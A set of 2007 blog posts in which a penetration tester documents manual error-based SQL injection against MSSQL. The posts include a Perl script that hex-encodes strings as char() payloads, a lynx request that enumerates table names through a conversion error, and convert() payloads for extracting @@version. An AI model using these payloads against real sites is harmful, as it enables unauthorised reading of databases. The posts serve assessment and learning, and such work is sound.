Bajau Legacy In Modern World: Project

Showing posts with label Project. Show all posts

Tuesday, August 28, 2007

SQLinjection -- convert method (continue)

My friend told me to encode some of the injection parameter from ascii to hex code. So I write a small perl script to do the job for me:

shaolinint@slash$ cat ascii2hex.pl
#! /usr/bin/perl
my $cmd = shift or die "usage: $0 string\n";
$cmd =~ s/(.)/ sprintf("char(0x%2x)%2B",ord($1)) /ge;
chomp($cmd);
print "$cmd\n";

shaolinint@slash$ perl ascii2hex.pl table1 char(0x74)%2Bchar(0x61)%2Bchar(0x62)%2Bchar(0x6c)%2Bchar(0x65)%2Bchar(0x31)

I had to removed the '%2B' at the end of the code above to make it work on real injections:

shaolinint@slash$ lynx -dump http://www.target.com/hello.aspx?id=(convert(varchar(255),(SELECT+top+1+table_name+FROM+
information_schema.tables+WHERE+table_name+NOT+IN(char(0x74)%2Bchar(0x61)%2Bchar(0x62)
%2Bchar(0x6c)%2Bchar(0x65)%2Bchar(0x31))))--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '{]table2 to a column of data type int.

The injections parameter working fine for me. But there is small problem, I still can not get the data from all tables and columns at the moment.

Monday, August 27, 2007

SQLinjection -- convert method

Last Saturday I started Portal Security Assessment for one of my client here in Saudi. And last night I completed a validation of all my findings. What make interesting during the assessment is, I found a potential SQL Injection on the portal which is a good thing for me... But the challenge is to enumerate tables and columns manually since most of tools that supposed to get the information failed to do so.... So I tried manually and play around with the injections but I still couldn't get what I want.

During my homeworks, I found a few interesting ways to print some of the informations. If you have any idea how to use following methods to enumerate tables and column, please let me know.

convert(int,convert(varchar,INJECTION_PARAMETER_HERE)) (convert(varchar(255),(INJECTION_PARAMETER_HERE)))--

For example:

http://microsoft.com/hello.asp?id=convert(int,convert(varchar,@@version))
http://microsoft.com/hello.asp?id=(convert(varchar(255),(@@version)))--

Monday, July 9, 2007

Seaweed v1.0

Seaweed, coded in Cocoa Object-C, is a SQL Injection scanner, able to crawl, detect SQL injection vectors, identify the back-end database and grab function call/UDF results (even execute system commands for MS-SQL). The concepts in use are different than the one used in other SQL injection scanners. I'm planning to import few script from perl and python instead of using my own kung-fu :)